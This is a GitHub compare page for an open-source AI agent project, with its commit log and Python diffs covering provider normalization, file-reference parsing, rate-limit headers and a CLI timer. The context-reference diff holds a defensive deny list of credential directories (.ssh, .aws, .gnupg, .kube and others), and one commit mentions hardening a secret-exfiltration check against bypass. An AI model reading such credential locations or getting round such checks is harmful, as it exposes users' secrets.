Compare commits

...

46 Commits

Author SHA1 Message Date
Mariano Nicolini c45d18265c fix tests 2026-04-10 18:59:35 -03:00
Mariano Nicolini 1c6d144a10 Merge branch 'main' into api-server-enforce-key 2026-04-10 18:47:59 -03:00
Teknium 496e378b10 fix: resolve overlay provider slug mismatch in /model picker (#7373)
HERMES_OVERLAYS keys use models.dev IDs (e.g. 'github-copilot') but
_PROVIDER_MODELS curated lists and config.yaml use Hermes provider IDs
('copilot'). list_authenticated_providers() Section 2 was using the
overlay key directly for model lookups and is_current checks, causing:
- 0 models shown for copilot, kimi, kilo, opencode, vercel
- is_current never matching the config provider

Fix: build reverse mapping from PROVIDER_TO_MODELS_DEV to translate
overlay keys to Hermes slugs before curated list lookup and result
construction. Also adds 'kimi-for-coding' alias in auth.py so the
picker's returned slug resolves correctly in resolve_provider().

Fixes #5223. Based on work by HearthCore (#6492) and linxule (#6287).

Co-authored-by: HearthCore <HearthCore@users.noreply.github.com>
Co-authored-by: linxule <linxule@users.noreply.github.com>
2026-04-10 14:46:57 -07:00
Shannon Sands 03f23f10e1 feat: multi-agent Discord filtering — skip messages addressed to other bots
Replace the simple DISCORD_IGNORE_NO_MENTION check with bot-aware
multi-agent filtering. When multiple agents share a channel:

- If other bots are @mentioned but this bot is not → stay silent
- If only humans are mentioned but not this bot → stay silent
- Messages with no mentions still flow to _handle_message for the
  existing DISCORD_REQUIRE_MENTION check
- DMs are unaffected (always handled)

This prevents both agents from responding when only one is addressed.
2026-04-11 07:46:44 +10:00
Mariano Nicolini 2b4abf8d9c move is_network_accessible helper to base.py 2026-04-10 18:36:19 -03:00
Julien Talbot 8bcb8b8e87 feat(providers): add native xAI provider
Adds xAI as a first-class provider: ProviderConfig in auth.py,
HermesOverlay in providers.py, 11 curated Grok models, URL mapping
in model_metadata.py, aliases (x-ai, x.ai), and env var tests.
Uses standard OpenAI-compatible chat completions.

Closes #7050
2026-04-10 13:40:38 -07:00
0xbyt4 f07b35acba fix: use raw docstring to suppress invalid escape sequence warning 2026-04-10 13:39:30 -07:00
Teknium 363d5d57be test: update schema assertion after maxItems removal 2026-04-10 13:38:14 -07:00
angelos 7ccdb74364 fix(delegate): make max_concurrent_children configurable + error on excess
`delegate_task` silently truncated batch tasks to 3 — the model sends
5 tasks, gets results for 3, never told 2 were dropped. Now returns a
clear tool_error explaining the limit and how to fix it.

The limit is configurable via:
  - delegation.max_concurrent_children in config.yaml (priority 1)
  - DELEGATION_MAX_CONCURRENT_CHILDREN env var (priority 2)
  - default: 3

Uses the same _load_config() path as the rest of delegate_task for
consistent config priority. Clamps to min 1, warns on non-integer
config values.

Also removes the hardcoded maxItems: 3 from the JSON schema — the
schema was blocking the model from even attempting >3 tasks before
the runtime check could fire. The runtime check gives a much more
actionable error message.

Backwards compatible: default remains 3, existing configs unchanged.
2026-04-10 13:38:14 -07:00
Tranquil-Flow 6c115440fd fix(delegate): sync self.base_url with client_kwargs after credential resolution
When delegation.base_url routes subagents to a different endpoint, the
correct URL was passed through _resolve_delegation_credentials() and
_build_child_agent() into AIAgent.__init__(), but self.base_url could
fall out of sync with client_kwargs["base_url"] — the value the OpenAI
client actually uses.

This caused billing_base_url in session records to show the parent's
endpoint while actual API calls went to the correct delegation target.

Keep self.base_url in sync with client_kwargs after the credential
resolution block, matching the existing pattern for self.api_key.

Fixes #6825
2026-04-10 13:38:14 -07:00
Teknium 4fb42d0193 fix: per-profile subprocess HOME isolation (#4426) (#7357)
Isolate system tool configs (git, ssh, gh, npm) per profile by injecting
a per-profile HOME into subprocess environments only.  The Python
process's own os.environ['HOME'] and Path.home() are never modified,
preserving all existing profile infrastructure.

Activation is directory-based: when {HERMES_HOME}/home/ exists on disk,
subprocesses see it as HOME.  The directory is created automatically for:
- Docker: entrypoint.sh bootstraps it inside the persistent volume
- Named profiles: added to _PROFILE_DIRS in profiles.py

Injection points (all three subprocess env builders):
- tools/environments/local.py _make_run_env() — foreground terminal
- tools/environments/local.py _sanitize_subprocess_env() — background procs
- tools/code_execution_tool.py child_env — execute_code sandbox

Single source of truth: hermes_constants.get_subprocess_home()

Closes #4426
2026-04-10 13:37:45 -07:00
Teknium f83e86d826 feat(cli): restore live per-tool elapsed timer in TUI spinner (#7359)
Brings back the live elapsed time counter that was lost when the CLI
transitioned from raw KawaiiSpinner animation to prompt_toolkit TUI.

The original implementation (Feb 2026) used KawaiiSpinner per tool call
with \r-based animation showing '(4.2s)' ticking up live. When
patch_stdout was introduced, the \r animation was disabled and replaced
with a static _spinner_text widget that only showed the tool name.

Now the spinner widget shows elapsed time again:
  💻 git log --oneline  (3.2s)

Implementation:
- Track _tool_start_time (monotonic) on tool.started events
- Clear it on tool.completed and thinking transitions
- get_spinner_text() computes live elapsed on each TUI repaint
- The existing poll loop already invalidates every ~0.15s, so no
  extra timer thread is needed

Addresses #4287.
2026-04-10 13:09:41 -07:00
0xbyt4 0bea603510 fix: handle NoneType request_overrides in fast_mode check (#7350) 2026-04-10 13:07:25 -07:00
Teknium 360b21ce95 fix(gateway): reject file paths in get_command() + file-drop tests (#7356)
Gateway get_command() now rejects paths containing /. Also adds 28 _detect_file_drop regression tests. From #6978 (@ygd58) and #6963 (@betamod).
2026-04-10 13:06:02 -07:00
kshitijk4poor 37a1c75716 fix(browser): hardening — dead code, caching, scroll perf, security, thread safety
Salvaged from PR #7276 (hardening-only subset; excluded 6 new tools
and unrelated scope additions from the contributor's commit).

- Remove dead DEFAULT_SESSION_TIMEOUT and unregistered browser_close schema
- Fix _camofox_eval wrong call signatures (_ensure_tab, _post args)
- Cache _find_agent_browser, _get_command_timeout, _discover_homebrew_node_dirs
- Replace 5x subprocess scroll loop with single pixel-arg call
- URL-decode before secret exfiltration check (bypass prevention)
- Protect _recording_sessions with _cleanup_lock (thread safety)
- Return failure on empty stdout instead of silent success
- Structure-aware _truncate_snapshot (cut at line boundaries)

Follow-up improvements over contributor's original:
- Move _EMPTY_OK_COMMANDS to module-level frozenset (avoid per-call allocation)
- Fix list+tuple concat in _run_browser_command PATH construction
- Update test_browser_homebrew_paths.py for tuple returns and cache fixtures

Co-authored-by: kshitijk4poor <82637225+kshitijk4poor@users.noreply.github.com>
Closes #7168, closes #7171, closes #7172, closes #7173
2026-04-10 13:05:44 -07:00
WAXLYY c6e1add6f1 fix(agent): preserve quoted @file references with spaces 2026-04-10 13:05:01 -07:00
Hermes Audit 2c99b4e79b fix(unicode): sanitize surrogate metadata and allow two-pass retry 2026-04-10 13:05:01 -07:00
Hermes Audit 71036a7a75 fix: handle UnicodeEncodeError with ASCII codec (#6843)
Broaden the UnicodeEncodeError recovery to handle systems with ASCII-only
locale (LANG=C, Chromebooks) where ANY non-ASCII character causes encoding
failure, not just lone surrogates.

Changes:
- Add _strip_non_ascii() and _sanitize_messages_non_ascii() helpers that
  strip all non-ASCII characters from message content, name, and tool_calls
- Update the UnicodeEncodeError handler to detect ASCII codec errors and
  fall back to non-ASCII sanitization after surrogate check fails
- Sanitize tool_calls arguments and name fields (not just content)
- Fix bare .encode() in cli.py suspend handler to use explicit utf-8
- Add comprehensive test suite (17 tests)
2026-04-10 13:05:01 -07:00
Teknium 7e28b7b5d5 fix: parallelize skills browse/search to prevent hanging (#7301)
hermes skills browse ran all 7 source adapters serially with no overall
timeout and no progress indicator. On a cold cache, GitHubSource alone
could make 100+ sequential HTTP calls (directory listing + inspect per
skill per tap), taking 5+ minutes with no output — appearing to hang.

Changes:
- Add parallel_search_sources() in tools/skills_hub.py that runs all
  source adapters concurrently via ThreadPoolExecutor with a 30s
  overall timeout. Sources that finish in time contribute results;
  slow ones are skipped gracefully with a visible notice.
- Update unified_search() to use parallel_search_sources() internally.
- Update do_browse() and do_search() in hermes_cli/skills_hub.py to
  show a Rich spinner while fetching, so the user sees activity.
- Bump per-source limits (clawhub 50→500, lobehub 50→500, etc.) now
  that fetching is parallel — yields far more results per browse.
- Report timed-out sources and suggest re-running for cached results.
- Replace 'inspect/install' footer with 'search deeper' tip.

Worst-case latency drops from 5+ minutes (serial) to ~30s (parallel
with timeout cap). Result count should jump from ~242 to 1000+.
2026-04-10 12:54:18 -07:00
Teknium a093eb47f7 fix: propagate child activity to parent during delegate_task (#7295)
When delegate_task runs, the parent agent's activity tracker freezes
because child.run_conversation() blocks and the child's own
_touch_activity() never propagates back to the parent. The gateway
inactivity timeout then fires a spurious 'No activity' warning and
eventually kills the agent, even though the subagent is actively working.

Fix: add a heartbeat thread in _run_single_child that calls
parent._touch_activity() every 30 seconds with detail from the child's
activity summary (current tool, iteration count). The thread is a daemon
that starts before child.run_conversation() and is cleaned up in the
finally block.

This also improves the gateway 'Still working...' status messages —
instead of just 'running: delegate_task', users now see what the
subagent is actually doing (e.g., 'delegate_task: subagent running
terminal (iteration 5/50)').
2026-04-10 12:51:30 -07:00
Teknium f72faf191c fix: fall back to default certs when CA bundle path doesn't exist (#7352)
_resolve_verify() returned stale CA bundle paths from auth.json without
checking if the file exists. When a user logs into Nous Portal on their
host (where SSL_CERT_FILE points to a valid cert), that path gets
persisted in auth.json. Running hermes model later in Docker where the
host path doesn't exist caused FileNotFoundError bubbling up as
'Could not verify credentials: [Errno 2] No such file or directory'.

Now _resolve_verify validates the path exists before returning it. If
missing, logs a warning and falls back to True (default certifi-based
TLS verification).
2026-04-10 12:51:19 -07:00
Mariano Nicolini f8dbe0ffd1 Merge branch 'main' into api-server-enforce-key 2026-04-10 11:14:20 -03:00
Teknium 7e60b09274 fix: add _session_model_overrides to test runner fixture
Follow-up for cherry-pick — _session_model_overrides was added to
GatewayRunner.__init__ after the fast mode PR was written.
2026-04-10 05:54:56 -07:00
Felix Cardix 970192f183 feat(gateway): add fast mode support to gateway chats 2026-04-10 05:54:56 -07:00
Kenny Xie 5b8beb0ead fix(gateway): handle provider command without config 2026-04-10 05:54:56 -07:00
Teknium 7cec784b64 fix: complete Weixin platform parity audit — 16 missing integration points
Systematic audit found Weixin missing from:

Code:
- gateway/run.py: early WEIXIN_ALLOW_ALL_USERS env check
- gateway/platforms/webhook.py: cross-platform delivery routing
- hermes_cli/dump.py: platform detection for config export
- hermes_cli/setup.py: hermes setup wizard platform list + _setup_weixin
- hermes_cli/skills_config.py: platform labels for skills config UI

Docs (11 pages):
- developer-guide/architecture.md: platform adapter listing
- developer-guide/cron-internals.md: delivery target table
- developer-guide/gateway-internals.md: file tree
- guides/cron-troubleshooting.md: supported platforms list
- integrations/index.md: platform links
- reference/toolsets-reference.md: toolset table
- user-guide/configuration.md: platform keys for tool_progress
- user-guide/features/cron.md: delivery target table
- user-guide/messaging/index.md: intro text, feature table,
  mermaid diagram, toolset table, setup links
- user-guide/messaging/webhooks.md: deliver field + routing table
- user-guide/sessions.md: platform identifiers table
2026-04-10 05:54:37 -07:00
Teknium be4f049f46 fix: salvage follow-ups for Weixin adapter (#6747)
- Remove sys.path.insert hack (leftover from standalone dev)
- Add token lock (acquire_scoped_lock/release_scoped_lock) in
  connect()/disconnect() to prevent duplicate pollers across profiles
- Fix get_connected_platforms: WEIXIN check must precede generic
  token/api_key check (requires both token AND account_id)
- Add WEIXIN_HOME_CHANNEL_NAME to _EXTRA_ENV_KEYS
- Add gateway setup wizard with QR login flow
- Add platform status check for partially configured state
- Add weixin.md docs page with full adapter documentation
- Update environment-variables.md reference with all 11 env vars
- Update sidebars.ts to include weixin docs page
- Wire all gateway integration points onto current main

Salvaged from PR #6747 by Zihan Huang.
2026-04-10 05:54:37 -07:00
Zihan Huang 5b63bf7f9a feat(gateway): add native Weixin/WeChat support via iLink Bot API
Add first-class Weixin platform adapter for personal WeChat accounts:
- Long-poll inbound delivery via iLink getupdates
- AES-128-ECB encrypted CDN media upload/download
- QR-code login flow for gateway setup wizard
- context_token persistence for reply continuity
- DM/group access policies with allowlists
- Native text, image, video, file, voice handling
- Markdown formatting with header rewriting and table-to-list conversion
- Block-aware message chunking (preserves fenced code blocks)
- Typing indicators via getconfig/sendtyping
- SSRF protection on remote media downloads
- Message deduplication with TTL

Integration across all gateway touchpoints:
- Platform enum, config, env overrides, connected platforms check
- Adapter creation in gateway runner
- Authorization maps (allowed users, allow all)
- Cron delivery routing
- send_message tool with native media support
- Toolset definition (hermes-weixin)
- Channel directory (session-based)
- Platform hint in prompt builder
- CLI status display
- hermes tools default toolset mapping

Co-authored-by: Zihan Huang <bravohenry@users.noreply.github.com>
2026-04-10 05:54:37 -07:00
Teknium 4a65c9cd08 fix: profile paths broken in Docker — profiles go to /root/.hermes instead of mounted volume (#7170)
In Docker, HERMES_HOME=/opt/data (set in Dockerfile) and users mount
their .hermes directory to /opt/data. However, profile operations used
Path.home() / '.hermes' which resolves to /root/.hermes in Docker —
an ephemeral container path, not the mounted volume.

This caused:
- Profiles created at /root/.hermes/profiles/ (lost on container recreate)
- active_profile sticky file written to wrong location
- profile list looking at wrong directory

Fix: Add get_default_hermes_root() to hermes_constants.py that detects
Docker/custom deployments (HERMES_HOME outside ~/.hermes) and returns
HERMES_HOME as the root. Also handles Docker profiles correctly
(<root>/profiles/<name> → root is grandparent).

Files changed:
- hermes_constants.py: new get_default_hermes_root()
- hermes_cli/profiles.py: _get_default_hermes_home() delegates to shared fn
- hermes_cli/main.py: _apply_profile_override() + _invalidate_update_cache()
- hermes_cli/gateway.py: _profile_suffix() + _profile_arg()
- Tests: 12 new tests covering Docker scenarios
2026-04-10 05:53:10 -07:00
Kenny Xie 916fbf362c fix(model): tighten direct-provider fallback normalization 2026-04-10 05:52:45 -07:00
Kenny Xie b730c2955a fix(model): normalize direct provider ids in auxiliary routing 2026-04-10 05:52:45 -07:00
Kenny Xie fd5cc6e1b4 fix(model): normalize native provider-prefixed model ids 2026-04-10 05:52:45 -07:00
r266-tech 1662b7f82a fix(test): correct mock target for fetch_api_models in custom provider tests
fetch_api_models is imported locally inside _model_flow_named_custom from
hermes_cli.models, not defined as a module-level attribute of hermes_cli.main.
Patch the source module so the local import picks up the mock.

Also force simple_term_menu ImportError so tests reliably use the input()
fallback path regardless of environment.

Co-Authored-By: Claude <noreply@anthropic.com>
2026-04-10 05:52:45 -07:00
r266-tech e3b395e17d test: add regression tests for custom provider model switching
Covers: probe always called, model switch works, probe failure fallback,
first-time flow unchanged.
2026-04-10 05:52:45 -07:00
r266-tech 0cdf5232ae fix: always show model selection menu for custom providers
Previously, _model_flow_named_custom() returned immediately when a saved
model existed, making it impossible to switch models on multi-model
endpoints (OpenRouter, vLLM clusters, etc.).

Now the function always probes the endpoint and shows the selection menu
with the current model pre-selected and marked '(current)'. Falls back
to the saved model if endpoint probing fails.

Fixes #6862
2026-04-10 05:52:45 -07:00
Ronald Reis 49bba1096e fix: opencode-go missing from /model list and improve HERMES_OVERLAYS credential check
When opencode-go API key is set, it should appear in the /model list.
The provider was already in PROVIDER_TO_MODELS_DEV and PROVIDER_REGISTRY,
so it appears via Part 1 (built-in source).

Also fixes a potential issue in Part 2 (HERMES_OVERLAYS) where providers
with auth_type=api_key but no extra_env_vars would not be detected:
- Now also checks api_key_env_vars from PROVIDER_REGISTRY for api_key auth_type

- Add test verifying opencode-go appears when OPENCODE_GO_API_KEY is set
2026-04-10 05:52:45 -07:00
Ronald Reis fd3e855d58 fix: pass config_context_length to switch_model context compressor
When switching models at runtime, the config_context_length override
was not being passed to the new context compressor instance. This
meant the user-specified context length from config.yaml was lost
after a model switch.

- Store _config_context_length on AIAgent instance during __init__
- Pass _config_context_length when creating new ContextCompressor in switch_model
- Add test to verify config_context_length is preserved across model switches

Fixes: quando estamos alterando o modelo não está alterando o tamanho do contexto
2026-04-10 05:52:45 -07:00
Teknium 5fc5ced972 fix: add Alibaba/DashScope rate-limit pattern to error classifier
Port from anomalyco/opencode#21355: Alibaba's DashScope API returns a
unique throttling message ('Request rate increased too quickly...') that
doesn't match standard rate-limit patterns ('rate limit', 'too many
requests'). This caused Alibaba errors to fall through to the 'unknown'
category rather than being properly classified as rate_limit with
appropriate backoff/rotation.

Add 'rate increased too quickly' to _RATE_LIMIT_PATTERNS and test with
the exact error message observed from the Alibaba provider.
2026-04-10 05:52:45 -07:00
Teknium 0e315a6f02 fix(telegram): use valid reaction emojis for processing completion (#7175)
Telegram's Bot API only allows a specific set of emoji for bot reactions
(the ReactionEmoji enum).  (U+2705) and  (U+274C) are not in that
set, causing on_processing_complete reactions to silently fail with
REACTION_INVALID (caught at debug log level).

Replace with 👍 (U+1F44D) / 👎 (U+1F44E) which are always available in
Telegram's allowed reaction list. The 👀 (eyes) reaction used by
on_processing_start was already valid.

Based on the fix by @ppdng in PR #6685.

Fixes #6068
2026-04-10 05:34:33 -07:00
Teknium 6d2fa03837 fix: UTF-8 config encoding, pairing hint, credential_pool key, header normalization (#7174)
Four small fixes: (1) UTF-8 encoding for config open (@zhangchn #7063), (2) pairing hint placeholders (@konsisumer #7057), (3) missing credential_pool in cheap route (@kuishou68 #7025), (4) case-insensitive rate limit headers (@kuishou68 #7019).
2026-04-10 05:33:48 -07:00
Teknium f3ae1d765d fix: flush stdin after curses/terminal menus to prevent escape sequence leakage (#7167)
After curses.wrapper() or simple_term_menu exits, endwin() restores the
terminal but does NOT drain the OS input buffer. Leftover escape-sequence
bytes from arrow key navigation remain buffered and get silently consumed
by the next input()/getpass.getpass() call.

This caused a user-reported bug where selecting Z.AI/GLM as provider wrote
^[^[ (two ESC chars) into .env as the API key, because the buffered escape
bytes were consumed by getpass before the user could type anything.

Fix: add flush_stdin() helper using termios.tcflush(TCIFLUSH) and call it
after every curses.wrapper() and simple_term_menu .show() return across all
interactive menu sites:
- hermes_cli/curses_ui.py (curses_checklist)
- hermes_cli/setup.py (_curses_prompt_choice)
- hermes_cli/tools_config.py (_prompt_choice)
- hermes_cli/auth.py (_prompt_model_selection)
- hermes_cli/main.py (3 simple_term_menu usages)
2026-04-10 05:32:31 -07:00
Mariano Nicolini 42e7755d4c Merge branch 'main' into api-server-enforce-key 2026-04-09 21:12:02 -03:00
Mariano Nicolini 68954b7c03 add helper function to check if host is network accessible and add tests for that function 2026-04-09 21:10:24 -03:00
Mariano Nicolini 95220facdf Merge branch 'main' into api-server-enforce-key 2026-04-09 17:20:30 -03:00
Mariano Nicolini 5ea9bf70de update code comments and documentation 2026-04-09 14:59:44 -03:00
Mariano Nicolini 67e4d43ea1 enforce api key when interface is not loopback 2026-04-09 14:29:44 -03:00
90 changed files with 5655 additions and 273 deletions
+27 -9
View File
@@ -1174,6 +1174,18 @@ def _to_async_client(sync_client, model: str):
return AsyncOpenAI(**async_kwargs), model
def _normalize_resolved_model(model_name: Optional[str], provider: str) -> Optional[str]:
"""Normalize a resolved model for the provider that will receive it."""
if not model_name:
return model_name
try:
from hermes_cli.model_normalize import normalize_model_for_provider
return normalize_model_for_provider(model_name, provider)
except Exception:
return model_name
def resolve_provider_client(
provider: str,
model: str = None,
@@ -1236,7 +1248,7 @@ def resolve_provider_client(
logger.warning("resolve_provider_client: openrouter requested "
"but OPENROUTER_API_KEY not set")
return None, None
final_model = model or default
final_model = _normalize_resolved_model(model or default, provider)
return (_to_async_client(client, final_model) if async_mode
else (client, final_model))
@@ -1247,7 +1259,7 @@ def resolve_provider_client(
logger.warning("resolve_provider_client: nous requested "
"but Nous Portal not configured (run: hermes auth)")
return None, None
final_model = model or default
final_model = _normalize_resolved_model(model or default, provider)
return (_to_async_client(client, final_model) if async_mode
else (client, final_model))
@@ -1261,7 +1273,7 @@ def resolve_provider_client(
logger.warning("resolve_provider_client: openai-codex requested "
"but no Codex OAuth token found (run: hermes model)")
return None, None
final_model = model or _CODEX_AUX_MODEL
final_model = _normalize_resolved_model(model or _CODEX_AUX_MODEL, provider)
raw_client = OpenAI(api_key=codex_token, base_url=_CODEX_AUX_BASE_URL)
return (raw_client, final_model)
# Standard path: wrap in CodexAuxiliaryClient adapter
@@ -1270,7 +1282,7 @@ def resolve_provider_client(
logger.warning("resolve_provider_client: openai-codex requested "
"but no Codex OAuth token found (run: hermes model)")
return None, None
final_model = model or default
final_model = _normalize_resolved_model(model or default, provider)
return (_to_async_client(client, final_model) if async_mode
else (client, final_model))
@@ -1289,7 +1301,10 @@ def resolve_provider_client(
"but base_url is empty"
)
return None, None
final_model = model or _read_main_model() or "gpt-4o-mini"
final_model = _normalize_resolved_model(
model or _read_main_model() or "gpt-4o-mini",
provider,
)
extra = {}
if "api.kimi.com" in custom_base.lower():
extra["default_headers"] = {"User-Agent": "KimiCLI/1.30.0"}
@@ -1304,7 +1319,7 @@ def resolve_provider_client(
_resolve_api_key_provider):
client, default = try_fn()
if client is not None:
final_model = model or default
final_model = _normalize_resolved_model(model or default, provider)
return (_to_async_client(client, final_model) if async_mode
else (client, final_model))
logger.warning("resolve_provider_client: custom/main requested "
@@ -1319,7 +1334,10 @@ def resolve_provider_client(
custom_base = custom_entry.get("base_url", "").strip()
custom_key = custom_entry.get("api_key", "").strip() or "no-key-required"
if custom_base:
final_model = model or _read_main_model() or "gpt-4o-mini"
final_model = _normalize_resolved_model(
model or _read_main_model() or "gpt-4o-mini",
provider,
)
client = OpenAI(api_key=custom_key, base_url=custom_base)
logger.debug(
"resolve_provider_client: named custom provider %r (%s)",
@@ -1351,7 +1369,7 @@ def resolve_provider_client(
if client is None:
logger.warning("resolve_provider_client: anthropic requested but no Anthropic credentials found")
return None, None
final_model = model or default_model
final_model = _normalize_resolved_model(model or default_model, provider)
return (_to_async_client(client, final_model) if async_mode else (client, final_model))
creds = resolve_api_key_provider_credentials(provider)
@@ -1370,7 +1388,7 @@ def resolve_provider_client(
)
default_model = _API_KEY_PROVIDER_AUX_MODELS.get(provider, "")
final_model = model or default_model
final_model = _normalize_resolved_model(model or default_model, provider)
# Provider-specific headers
headers = {}
+36 -7
View File
@@ -13,8 +13,9 @@ from typing import Awaitable, Callable
from agent.model_metadata import estimate_tokens_rough
_QUOTED_REFERENCE_VALUE = r'(?:`[^`\n]+`|"[^"\n]+"|\'[^\'\n]+\')'
REFERENCE_PATTERN = re.compile(
r"(?<![\w/])@(?:(?P<simple>diff|staged)\b|(?P<kind>file|folder|git|url):(?P<value>\S+))"
rf"(?<![\w/])@(?:(?P<simple>diff|staged)\b|(?P<kind>file|folder|git|url):(?P<value>{_QUOTED_REFERENCE_VALUE}(?::\d+(?:-\d+)?)?|\S+))"
)
TRAILING_PUNCTUATION = ",.;!?"
_SENSITIVE_HOME_DIRS = (".ssh", ".aws", ".gnupg", ".kube", ".docker", ".azure", ".config/gh")
@@ -81,14 +82,10 @@ def parse_context_references(message: str) -> list[ContextReference]:
value = _strip_trailing_punctuation(match.group("value") or "")
line_start = None
line_end = None
target = value
target = _strip_reference_wrappers(value)
if kind == "file":
range_match = re.match(r"^(?P<path>.+?):(?P<start>\d+)(?:-(?P<end>\d+))?$", value)
if range_match:
target = range_match.group("path")
line_start = int(range_match.group("start"))
line_end = int(range_match.group("end") or range_match.group("start"))
target, line_start, line_end = _parse_file_reference_value(value)
refs.append(
ContextReference(
@@ -375,6 +372,38 @@ def _strip_trailing_punctuation(value: str) -> str:
return stripped
def _strip_reference_wrappers(value: str) -> str:
if len(value) >= 2 and value[0] == value[-1] and value[0] in "`\"'":
return value[1:-1]
return value
def _parse_file_reference_value(value: str) -> tuple[str, int | None, int | None]:
quoted_match = re.match(
r'^(?P<quote>`|"|\')(?P<path>.+?)(?P=quote)(?::(?P<start>\d+)(?:-(?P<end>\d+))?)?$',
value,
)
if quoted_match:
line_start = quoted_match.group("start")
line_end = quoted_match.group("end")
return (
quoted_match.group("path"),
int(line_start) if line_start is not None else None,
int(line_end or line_start) if line_start is not None else None,
)
range_match = re.match(r"^(?P<path>.+?):(?P<start>\d+)(?:-(?P<end>\d+))?$", value)
if range_match:
line_start = int(range_match.group("start"))
return (
range_match.group("path"),
line_start,
int(range_match.group("end") or range_match.group("start")),
)
return _strip_reference_wrappers(value), None, None
def _remove_reference_tokens(message: str, refs: list[ContextReference]) -> str:
pieces: list[str] = []
cursor = 0
+1
View File
@@ -112,6 +112,7 @@ _RATE_LIMIT_PATTERNS = [
"try again in",
"please retry after",
"resource_exhausted",
"rate increased too quickly", # Alibaba/DashScope throttling
]
# Usage-limit patterns that need disambiguation (could be billing OR rate_limit)
+1
View File
@@ -213,6 +213,7 @@ _URL_TO_PROVIDER: Dict[str, str] = {
"models.github.ai": "copilot",
"api.fireworks.ai": "fireworks",
"opencode.ai": "opencode-go",
"api.x.ai": "xai",
}
+8
View File
@@ -356,6 +356,14 @@ PLATFORM_HINTS = {
"MEDIA:/absolute/path/to/file in your response. Images (.jpg, .png, "
".heic) appear as photos and other files arrive as attachments."
),
"weixin": (
"You are on Weixin/WeChat. Markdown formatting is supported, so you may use it when "
"it improves readability, but keep the message compact and chat-friendly. You can send media files natively: "
"include MEDIA:/absolute/path/to/file in your response. Images are sent as native "
"photos, videos play inline when supported, and other files arrive as downloadable "
"documents. You can also include image URLs in markdown format ![alt](url) and they "
"will be downloaded and sent as native media when possible."
),
}
CONTEXT_FILE_MAX_CHARS = 20_000
+8 -4
View File
@@ -97,8 +97,12 @@ def parse_rate_limit_headers(
Returns None if no rate limit headers are present.
"""
# Normalize to lowercase so lookups work regardless of how the server
# capitalises headers (HTTP header names are case-insensitive per RFC 7230).
lowered = {k.lower(): v for k, v in headers.items()}
# Quick check: at least one rate limit header must exist
has_any = any(k.lower().startswith("x-ratelimit-") for k in headers)
has_any = any(k.startswith("x-ratelimit-") for k in lowered)
if not has_any:
return None
@@ -109,9 +113,9 @@ def parse_rate_limit_headers(
# resource="tokens", suffix="-1h" -> per-hour
tag = f"{resource}{suffix}"
return RateLimitBucket(
limit=_safe_int(headers.get(f"x-ratelimit-limit-{tag}")),
remaining=_safe_int(headers.get(f"x-ratelimit-remaining-{tag}")),
reset_seconds=_safe_float(headers.get(f"x-ratelimit-reset-{tag}")),
limit=_safe_int(lowered.get(f"x-ratelimit-limit-{tag}")),
remaining=_safe_int(lowered.get(f"x-ratelimit-remaining-{tag}")),
reset_seconds=_safe_float(lowered.get(f"x-ratelimit-reset-{tag}")),
captured_at=now,
)
+1
View File
@@ -181,6 +181,7 @@ def resolve_turn_route(user_message: str, routing_config: Optional[Dict[str, Any
"api_mode": runtime.get("api_mode"),
"command": runtime.get("command"),
"args": list(runtime.get("args") or []),
"credential_pool": runtime.get("credential_pool"),
},
"label": f"smart route → {route.get('model')} ({runtime.get('provider')})",
"signature": (
+48 -5
View File
@@ -319,7 +319,7 @@ def load_cli_config() -> Dict[str, Any]:
# Load from file if exists
if config_path.exists():
try:
with open(config_path, "r") as f:
with open(config_path, "r", encoding="utf-8") as f:
file_config = yaml.safe_load(f) or {}
_file_has_terminal_config = "terminal" in file_config
@@ -1048,7 +1048,7 @@ def _termux_example_image_path(filename: str = "cat.png") -> str:
def _split_path_input(raw: str) -> tuple[str, str]:
"""Split a leading file path token from trailing free-form text.
r"""Split a leading file path token from trailing free-form text.
Supports quoted paths and backslash-escaped spaces so callers can accept
inputs like:
@@ -1719,6 +1719,7 @@ class HermesCLI:
self._secret_state = None
self._secret_deadline = 0
self._spinner_text: str = "" # thinking spinner text for TUI
self._tool_start_time: float = 0.0 # monotonic timestamp when current tool started (for live elapsed)
self._command_running = False
self._command_status = ""
self._attached_images: list[Path] = []
@@ -2027,6 +2028,25 @@ class HermesCLI:
current_model = (self.model or "").strip()
changed = False
try:
from hermes_cli.model_normalize import (
_AGGREGATOR_PROVIDERS,
normalize_model_for_provider,
)
if resolved_provider not in _AGGREGATOR_PROVIDERS:
normalized_model = normalize_model_for_provider(current_model, resolved_provider)
if normalized_model and normalized_model != current_model:
if not self._model_is_default:
self.console.print(
f"[yellow]⚠️ Normalized model '{current_model}' to '{normalized_model}' for {resolved_provider}.[/]"
)
self.model = normalized_model
current_model = normalized_model
changed = True
except Exception:
pass
if resolved_provider == "copilot":
try:
from hermes_cli.models import copilot_model_api_mode, normalize_copilot_model_id
@@ -2072,7 +2092,7 @@ class HermesCLI:
return changed
if resolved_provider != "openai-codex":
return False
return changed
# 1. Strip provider prefix ("openai/gpt-5.4" → "gpt-5.4")
if "/" in current_model:
@@ -2111,6 +2131,7 @@ class HermesCLI:
if not text:
self._flush_reasoning_preview(force=True)
self._spinner_text = text or ""
self._tool_start_time = 0.0 # clear tool timer when switching to thinking
self._invalidate()
# ── Streaming display ────────────────────────────────────────────────
@@ -6126,11 +6147,20 @@ class HermesCLI:
Updates the TUI spinner widget so the user can see what the agent
is doing during tool execution (fills the gap between thinking
spinner and next response). Also plays audio cue in voice mode.
On tool.started, records a monotonic timestamp so get_spinner_text()
can show a live elapsed timer (the TUI poll loop already invalidates
every ~0.15s, so the counter updates automatically).
"""
# Only act on tool.started; ignore tool.completed, reasoning.available, etc.
if event_type == "tool.completed":
import time as _time
self._tool_start_time = 0.0
self._invalidate()
return
if event_type != "tool.started":
return
if function_name and not function_name.startswith("_"):
import time as _time
from agent.display import get_tool_emoji
emoji = get_tool_emoji(function_name)
label = preview or function_name
@@ -6139,6 +6169,7 @@ class HermesCLI:
if _pl > 0 and len(label) > _pl:
label = label[:_pl - 3] + "..."
self._spinner_text = f"{emoji} {label}"
self._tool_start_time = _time.monotonic()
self._invalidate()
if not self._voice_mode:
@@ -7980,7 +8011,7 @@ class HermesCLI:
agent_name = get_active_skin().get_branding("agent_name", "Hermes Agent")
msg = f"\n{agent_name} has been suspended. Run `fg` to bring {agent_name} back."
def _suspend():
os.write(1, msg.encode())
os.write(1, msg.encode("utf-8", errors="replace"))
os.kill(0, _sig.SIGTSTP)
run_in_terminal(_suspend)
@@ -8340,6 +8371,17 @@ class HermesCLI:
txt = cli_ref._spinner_text
if not txt:
return []
# Append live elapsed timer when a tool is running
t0 = cli_ref._tool_start_time
if t0 > 0:
import time as _time
elapsed = _time.monotonic() - t0
